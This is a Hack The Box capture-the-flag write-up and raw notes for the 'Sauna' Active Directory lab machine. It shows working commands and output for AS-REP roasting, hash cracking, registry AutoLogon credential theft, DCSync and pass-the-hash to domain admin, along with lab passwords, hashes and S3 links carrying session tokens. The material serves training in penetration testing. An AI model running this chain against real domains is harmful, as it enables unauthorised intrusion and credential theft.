Hack The Box · Lab
Sauna

Sauna

EasyWindowsActive DirectoryKerberos

Target: 10.10.10.175 | Difficulty: Easy | OS: Windows | Domain: EGOTISTICAL-BANK.LOCAL

Environment Setup

export IP=10.10.10.175
export DOMAIN=EGOTISTICAL-BANK.LOCAL
echo "$IP sauna.egotistical-bank.local egotistical-bank.local" | sudo tee -a /etc/hosts

Step 1 — Port Scan & Service Enumeration

Why: Identify exposed services and confirm this is a Domain Controller with web and WinRM access.

nmap -sCV -p- --min-rate 5000 -oN sauna.nmap $IP

Output:

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws

Key findings: Standard AD DC profile. HTTP (80) and WinRM (5985) are both exposed — worth enumerating the web service for usernames.

Step 2 — Web Reconnaissance & Username Generation

Why: The bank's public website may expose employee names that can be converted to valid AD username formats for a Kerberos attack.

# Browse http://$IP/about.html — the "Meet The Team" staff page lists:
# Fergus Smith, Shaun Coins, Hugo Bear, Bowie Taylor, Sophie Driver, Steven Kerb, Jenny Joy

# Generate common AD username formats:
cat > users.txt << 'EOF'
fsmith
scoins
hbear
btaylor
sdriver
skerb
jjoy
fergus.smith
shaun.coins
hugo.bear
bowie.taylor
sophie.driver
steven.kerb
jenny.joy
f.smith
s.coins
h.bear
smithf
EOF

Key findings: Seven employee names enumerated from the About page. Multiple AD username formats generated for AS-REP roast testing.

Step 3 — AS-REP Roasting

Why: If any accounts have Kerberos pre-authentication disabled, we can request an encrypted AS-REP ticket without credentials and crack it offline.

impacket-GetNPUsers $DOMAIN/ -usersfile users.txt -dc-ip $IP -no-pass -format hashcat

Output:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:1c8f...e4a2$<hash>

hashcat -m 18200 fsmith.hash /usr/share/wordlists/rockyou.txt --force

Output:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:...:Thestrokes23

Key findings: fsmith (Fergus Smith) has pre-authentication disabled. Cracked offline: fsmith:Thestrokes23.

Step 4 — WinRM Access as fsmith

Why: Port 5985 (WinRM) is open — if fsmith is in Remote Management Users, we get a shell directly.

evil-winrm -i $IP -u fsmith -p 'Thestrokes23'

Output:

Evil-WinRM shell v3.x
*Evil-WinRM* PS C:\Users\fsmith\Documents>

type C:\Users\fsmith\Desktop\user.txt

Key findings: Shell as fsmith. User flag captured.

Step 5 — AutoLogon Credential Discovery

Why: Windows AutoLogon stores service account credentials in the registry in cleartext — a common misconfiguration when a low-privilege account needs to log in automatically.

*Evil-WinRM* PS> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\winlogon"

Output:

DefaultDomainName    REG_SZ    EGOTISTICALBANK
DefaultUserName      REG_SZ    EGOTISTICALBANK\svc_loanmgr
DefaultPassword      REG_SZ    Moneymakestheworldgoround!

Key findings: AutoLogon configured with svc_loanmgr:Moneymakestheworldgoround! stored in plaintext.

Step 6 — BloodHound Enumeration as svc_loanmgr

Why: Map Active Directory ACL paths from svc_loanmgr to discover privilege escalation routes toward Domain Admin.

bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' \
  -d $DOMAIN -dc sauna.egotistical-bank.local -ns $IP --zip -c All

# BloodHound GUI → Mark svc_loanmgr as Owned
# Shortest Paths to Domain Admins:
# svc_loanmgr → GetChanges + GetChangesAll → EGOTISTICAL-BANK.LOCAL
# → DCSync rights!

Key findings: svc_loanmgr holds GetChanges and GetChangesAll rights on the domain object — full DCSync capability without touching LSASS.

Step 7 — DCSync → Dump Administrator Hash

Why: DCSync impersonates a Domain Controller replication request to extract NTLM hashes for any account directly from Active Directory.

impacket-secretsdump $DOMAIN/svc_loanmgr:'Moneymakestheworldgoround!'@$IP \
  -just-dc-user administrator

Output:

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::

Key findings: Administrator NT hash extracted: 823452073d75b9d1cf70ebdf86c7f98e.

Step 8 — Pass-the-Hash → Domain Admin

Why: WinRM accepts NTLM authentication — pass the Administrator hash directly without needing to crack it.

evil-winrm -i $IP -u administrator -H '823452073d75b9d1cf70ebdf86c7f98e'

Output:

*Evil-WinRM* PS C:\Users\Administrator\Documents>

type C:\Users\Administrator\Desktop\root.txt

Key findings: Full Domain Admin access via pass-the-hash. Root flag captured.

Credentials

Username Password / Hash Source
fsmith Thestrokes23 AS-REP Roast (KRB5 offline crack)
svc_loanmgr Moneymakestheworldgoround! AutoLogon registry (cleartext)
Administrator 823452073d75b9d1cf70ebdf86c7f98e (NT) DCSync via svc_loanmgr

Full Attack Chain

Web Staff Page (/about.html)
        │
        ▼ Enumerate employee names → generate username wordlist
AS-REP Roast (GetNPUsers — no pre-auth on fsmith)
        │
        ▼ hashcat -m 18200 → Thestrokes23
fsmith:Thestrokes23
        │
        ▼ evil-winrm :5985
USER FLAG
        │
        ▼ reg query winlogon (AutoLogon plaintext)
svc_loanmgr:Moneymakestheworldgoround!
        │
        ▼ BloodHound → GetChanges + GetChangesAll on domain
DCSync Rights on EGOTISTICAL-BANK.LOCAL
        │
        ▼ secretsdump -just-dc-user administrator
Administrator:823452073d75b9d1cf70ebdf86c7f98e
        │
        ▼ evil-winrm -H (Pass-the-Hash)
DOMAIN ADMIN / ROOT FLAG

© 0xNRG — Sauna pwned — 2020-07-18

notes

Startoff with nmap

basic


```shell
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49677/tcp open  unknown
49689/tcp open  unknown
49696/tcp open  unknown
```


scan on spec ports


```shell
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-27 14:12:42Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-27T14:12:45
|_  start_date: N/A
|_clock-skew: 7h00m00s
```

HTTP p80

![Screenshot_2025-07-27_at_9.24.19_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/765900b2-381a-4af5-89fe-0ff1c5a93c93/Screenshot_2025-07-27_at_9.24.19_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB4667HK4TK3R%2F20260418%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260418T050602Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEBkaCXVzLXdlc3QtMiJIMEYCIQCDYktry%2FcZhN8kio2yA%2FYc7Sf8AXvdg5WDIeez%2B54%2FUgIhAKj7eNGRco8T%2FgoA0h5Ao%2FZisjHE3poeGRwf4BNwzVJ0KogECOL%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMNjM3NDIzMTgzODA1IgzjSXMdP5%2FEFur%2B5oIq3AOjbC%2BQlLVemeLiBY2DAnOPZpTEHa7P1IVfHSyB9mdhNsm8RvSO2myWPzF769UgK0ayvhn9my1cK5r3kP6IIvvGNAS55AjTMyzFPp5urgp1vB6Z%2Bi8hNH0j3xPKPqkiIsnZN33hIf7TqQ2aJsmr6EQlBm%2BlaDszFjORYU75%2Backo6v7ZQesdLx8igkt46X0Pd6n4MILiewDswMSrVnabMSWAT9kRU8FpJkCsGh4g1KEF1zOTC51faOlBwja0PqADS77c8LzyuxFjbwexNYEpRzAz1rmNBaveQozv7t2PJ%2FBMjxBorXhrRyZb4o4KeD%2F645ufNqZk8%2BVZSV6%2FWkSJHAkK7Wo8vQ4Z67J91ifz4P7sUmF7ZYyKKGQp1ttEUehNV9onMU1rcg81AMVTWOrMJqqzBKYrs4uf0Zx0rmuRg%2F72htmE5LgAm859ZGDxSDTFK7s4tSdHmQ5VwQtU9gP71GmmeTmcrumI4NvH%2FlMrKsYwXKapEFPoM9EuYM10JNSClXhNhPK1dNbIfugVbwth1kjzia4ydRT82MX4z9tgzbSVr52096Uf9X0IxtHzsY7%2B0juGVAX8xOBWZPq8TsE9RhGa%2FPbiZX52JdHMVODf0kG0ehhswwNmobV1JnFAjDvrIvPBjqkAf2agBCMoe3cN3851UpQX3XI5DNV0rYOqIzoQeguFT8KtyZy6udNlSJpjUmiLnTt9p9uZynZ6kSE2EjZUVN%2B%2Fak1FrsSBTxmlIhSTIhGhWm9%2BnP4Xy4bsN7Zjkqp9YfqVFsHDXOiCzaHRp8aRJ9dWqYC85lX1MTzLAVADPVQXz91DgKozj%2FusdUKwlyf9BA24yOpEvBWJf4OsZafyG%2FLBC9Zw0yg&X-Amz-Signature=4db64dbc0d2bae8ba0519b288bb8c95933cada55a343531f9beef1580c2d8530&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


Possible users?


![Screenshot_2025-07-27_at_9.26.13_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/f25a4365-056e-497a-87a8-323dcc8647aa/Screenshot_2025-07-27_at_9.26.13_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB4667HK4TK3R%2F20260418%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260418T050602Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEBkaCXVzLXdlc3QtMiJIMEYCIQCDYktry%2FcZhN8kio2yA%2FYc7Sf8AXvdg5WDIeez%2B54%2FUgIhAKj7eNGRco8T%2FgoA0h5Ao%2FZisjHE3poeGRwf4BNwzVJ0KogECOL%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMNjM3NDIzMTgzODA1IgzjSXMdP5%2FEFur%2B5oIq3AOjbC%2BQlLVemeLiBY2DAnOPZpTEHa7P1IVfHSyB9mdhNsm8RvSO2myWPzF769UgK0ayvhn9my1cK5r3kP6IIvvGNAS55AjTMyzFPp5urgp1vB6Z%2Bi8hNH0j3xPKPqkiIsnZN33hIf7TqQ2aJsmr6EQlBm%2BlaDszFjORYU75%2Backo6v7ZQesdLx8igkt46X0Pd6n4MILiewDswMSrVnabMSWAT9kRU8FpJkCsGh4g1KEF1zOTC51faOlBwja0PqADS77c8LzyuxFjbwexNYEpRzAz1rmNBaveQozv7t2PJ%2FBMjxBorXhrRyZb4o4KeD%2F645ufNqZk8%2BVZSV6%2FWkSJHAkK7Wo8vQ4Z67J91ifz4P7sUmF7ZYyKKGQp1ttEUehNV9onMU1rcg81AMVTWOrMJqqzBKYrs4uf0Zx0rmuRg%2F72htmE5LgAm859ZGDxSDTFK7s4tSdHmQ5VwQtU9gP71GmmeTmcrumI4NvH%2FlMrKsYwXKapEFPoM9EuYM10JNSClXhNhPK1dNbIfugVbwth1kjzia4ydRT82MX4z9tgzbSVr52096Uf9X0IxtHzsY7%2B0juGVAX8xOBWZPq8TsE9RhGa%2FPbiZX52JdHMVODf0kG0ehhswwNmobV1JnFAjDvrIvPBjqkAf2agBCMoe3cN3851UpQX3XI5DNV0rYOqIzoQeguFT8KtyZy6udNlSJpjUmiLnTt9p9uZynZ6kSE2EjZUVN%2B%2Fak1FrsSBTxmlIhSTIhGhWm9%2BnP4Xy4bsN7Zjkqp9YfqVFsHDXOiCzaHRp8aRJ9dWqYC85lX1MTzLAVADPVQXz91DgKozj%2FusdUKwlyf9BA24yOpEvBWJf4OsZafyG%2FLBC9Zw0yg&X-Amz-Signature=7e7777ef809ea5f155b9202ab975b6ba3f0caf267cb38d0e2fa1eb0273759e63&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)

SMB Anonymous Auth success

Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)

Guest access null

Anon/guest share enum null

LDAP Anonymous auth success

windapsearch


```shell
❯ py /root/offsec/tools/windapsearch/windapsearch.py -d $DOMAIN --dc-ip $IP -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.175
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 None

[+] Enumerating all AD users

[*] Bye!
```

RPC Anon Auth null

We collected users from webpage and used usernames-generator.py

Used kerbrute with generated list and got hash from Fsmith due to no pre auth on account. It is encryption $18.

$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:274c882102df475650885d34e854453d$04cfd3ca758d056eae2098ad4fd96c375f60edc7e46ca226428b38c21264a47871cb5468880b1125a242333c66a49c7848b59cfb1f1fb3d0ad057f4283918148fdac531fb4a12435cd6584b2110ad8efd452eebe75bf4e62c1a2df19a87dcb39952a93a514820a805bbfae6b7036a785c18d5c2ca6053020e645e33582efd9659261d2749f35ccc0183bf93d29a83d0e6c7f97fde4eb4bb123fc1073b3b3108b2f274a73a145ca7f3275fb8cb5c1c27bcb272a5aa5d3764c56c244853f1f1f6b191664fc2ee91df460fd1be178b9053a63c33dc2eaa45a5b32b83b929c89b055bb1fa0c7f1a600b7c0190975e7ac86129b1bc34bcf0595af4be6bf01ae2aa6ec2a9e0988f1efb1c1f91a701adba50c919f9a2c9b3895

After running GetNPUsers.py we got Fsmith $23 TGT

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e67a11e6a2abbed3aa5c07d94d84f71e$f0c81c4b62bec0393e3146838b18e7b3a28385eaef52ccc3aa47bd91e7d54fbc15313195e50b0d8537e2fbcdd4c182a8e340570b4b6129201a14495f371fb67e57e24a505bdef08632446a243596ee8a7d932a025107eaaae658c4d15965c8bf94f0afc15da92ff5bcdb5edf1258d973ba18f989379cbabf104ea7bec73832d72fa330b88c838c6b95e6c0bf55ac1472ef8522a90b3b2ad9b385cf96976e6bd8f5592aa0d02b1b954c13088541df86dbd2d8071024f2aab5feb65d4a23620d38218a6183d8be2138a105557d10bb327664017cc21e918c97db7796e0e07d109a0b6677607c418bd7672d6a1d0cdb1e889f9387024764d84a6b30d59f20b4e23d

TGT Cracked with hashcat

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e67...SNIP...3d:Thestrokes23

Authorizing as fsmith from here on

SMB user enum

```shell
Administrator
krbtgt
hsmith
fsmith
svc_loanmgr
```


shares enum


```shell
ADMIN$                          Remote Admin
C$                              Default share
IPC$            READ            Remote IPC
NETLOGON        READ            Logon server share 
print$          READ            Printer Drivers
RICOH Aficio SP 8300DN PCL 6 WRITE           We cant print money
SYSVOL          READ            Logon server share
```


Write perm on RICOH..


    dir don’t exist


smb rid brute & awk for `SidTypeUser`


```shell
Administrator
Guest
krbtgt
SAUNA$
HSmith
FSmith
svc_loanmgr
```

No TGT pre auth for the rest of users

WinRM

```shell
❯ nxc winrm $IP -u $USER -p $PASS
[+] EGOTISTICAL-BANK.LOCAL\FSmith:Thestrokes23 (Pwn3d!)
```


```shell
❯ evil-winrm -i $IP -u $USER -p $PASS
*Evil-WinRM* PS C:\Users\FSmith\Documents>
```

PRIVESC

Uplaoded `winPEASx64.exe to target.

```shell
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
```

Bloodhound

![Screenshot_2025-07-27_at_11.22.53_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/39aafe7a-1717-4a20-b427-589cb8ad95e5/Screenshot_2025-07-27_at_11.22.53_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466TVVRO4ST%2F20260418%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260418T050604Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEBwaCXVzLXdlc3QtMiJIMEYCIQCCGVQzICI%2FGLvI2DqaX%2BN5N6RX8raZ1TzIr3FX%2FzGzeQIhAIZOwMTTVKayzHDH3CVerBh822tIzyEImS62rziz%2BJXmKogECOX%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMNjM3NDIzMTgzODA1IgzDIneK39W1GjErtPUq3APWS9LtQat8NdyLcoOSR61IkhWy75%2BHnj84uja2S6NGs0hqXuOUSxLPsBnHTIfVfPSPgQ1XnDiFCOc9BlE%2BDK5RjrOsbKCvi1Haf%2Fjth6JgYU2oUED8ryisrIU7aDKQxvPJXqL9KlJVD%2FmEtz3rNg1l4FzrTFtNEL8dGlgnp28MztshpDaTSqQbn0NSPD%2BSuZi0iMST3vh6lrHJLqRkFTeeESPZvftJTx1vEpUtOW%2FfSXseDvywZZpWEaJrGarCcR2pb5QFMIMZ03QqHt%2BHCRs38sO8eHKKFelJ2ve4GLSbCtUTwAOMfvDpUaw3%2BPo%2FJ1iQ0klnIsRwB6%2B2gGJmhlAZXDkhcaoml9X709Uqspz5jxlA%2BDCZmTmRhvcjolx3x8eOeQjqCibdBs2PSaVJTBJStRPnbIDCcFk0ZQpiMRmUPDM8H3%2BWIHXdWFD68CTkyrmo6r0bWNuSVm%2FHls92aixc%2F2i2ndYs5m%2BUSQTq9IW1Y90ucFEaI%2B3TgK2w7fQB3coRMx2hBUmk%2F8yUsfr9b%2BnDgugIwaCoN2shXHh9UHnMKA7zStee6e5tCDqz8LD5adWncTOEaxk%2BMdCrkfKUduZqsP4Hf%2FxFC1BaqOontGaLE7m3OH4HFECnF%2Fh5pDCKh4zPBjqkAdraoDohjucD1vribJe7S6lwEGLd%2F1vFTIJpb%2FHdqqeA6J%2BgH7ZjG%2FaW3%2BQDit8TBjr7fvlNDkiMvmdixTSOh0nIDQFu%2FiKYJyicE24QLwDWe8QohQBz5TRajkZU6ctbjGm5WIoBJX38pWHhpOq%2FcrWppbmzxa7o7B37Yyny8B8Kk6YVT07VUGrpYicmZMUQDcnoxvOuk3o3ZPMixYNqt62yL8en&X-Amz-Signature=e9d8853e2048c4d8673339f3673691f3c7ac79225d12250c50a8883af50e9f2f&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


![Screenshot_2025-07-27_at_11.23.24_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/605cdd4d-b2d1-48f2-9be6-8916b5f383d9/Screenshot_2025-07-27_at_11.23.24_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466TVVRO4ST%2F20260418%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260418T050604Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEBwaCXVzLXdlc3QtMiJIMEYCIQCCGVQzICI%2FGLvI2DqaX%2BN5N6RX8raZ1TzIr3FX%2FzGzeQIhAIZOwMTTVKayzHDH3CVerBh822tIzyEImS62rziz%2BJXmKogECOX%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMNjM3NDIzMTgzODA1IgzDIneK39W1GjErtPUq3APWS9LtQat8NdyLcoOSR61IkhWy75%2BHnj84uja2S6NGs0hqXuOUSxLPsBnHTIfVfPSPgQ1XnDiFCOc9BlE%2BDK5RjrOsbKCvi1Haf%2Fjth6JgYU2oUED8ryisrIU7aDKQxvPJXqL9KlJVD%2FmEtz3rNg1l4FzrTFtNEL8dGlgnp28MztshpDaTSqQbn0NSPD%2BSuZi0iMST3vh6lrHJLqRkFTeeESPZvftJTx1vEpUtOW%2FfSXseDvywZZpWEaJrGarCcR2pb5QFMIMZ03QqHt%2BHCRs38sO8eHKKFelJ2ve4GLSbCtUTwAOMfvDpUaw3%2BPo%2FJ1iQ0klnIsRwB6%2B2gGJmhlAZXDkhcaoml9X709Uqspz5jxlA%2BDCZmTmRhvcjolx3x8eOeQjqCibdBs2PSaVJTBJStRPnbIDCcFk0ZQpiMRmUPDM8H3%2BWIHXdWFD68CTkyrmo6r0bWNuSVm%2FHls92aixc%2F2i2ndYs5m%2BUSQTq9IW1Y90ucFEaI%2B3TgK2w7fQB3coRMx2hBUmk%2F8yUsfr9b%2BnDgugIwaCoN2shXHh9UHnMKA7zStee6e5tCDqz8LD5adWncTOEaxk%2BMdCrkfKUduZqsP4Hf%2FxFC1BaqOontGaLE7m3OH4HFECnF%2Fh5pDCKh4zPBjqkAdraoDohjucD1vribJe7S6lwEGLd%2F1vFTIJpb%2FHdqqeA6J%2BgH7ZjG%2FaW3%2BQDit8TBjr7fvlNDkiMvmdixTSOh0nIDQFu%2FiKYJyicE24QLwDWe8QohQBz5TRajkZU6ctbjGm5WIoBJX38pWHhpOq%2FcrWppbmzxa7o7B37Yyny8B8Kk6YVT07VUGrpYicmZMUQDcnoxvOuk3o3ZPMixYNqt62yL8en&X-Amz-Signature=ec8cbd90839ad566800ed8edaa4dde0d2391df45a690ffd631ba77cc4c82d4ac&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


Lets use secretdump


```shell
❯ secretsdump.py $DOMAIN/$USER:$PASS@$IP -just-dc-user Administrator

...SNIP...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
```

We have Administrator HASH

Let’s pass the hash


```shell
❯ evil-winrm -i $IP -u $USER -H $HASH
                                        
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
```

Let’s use psexec also

❯ psexec.py $DOMAIN/$USER@$IP -hashes $HASH

C:\Windows\system32> whoami
nt authority\system

image.png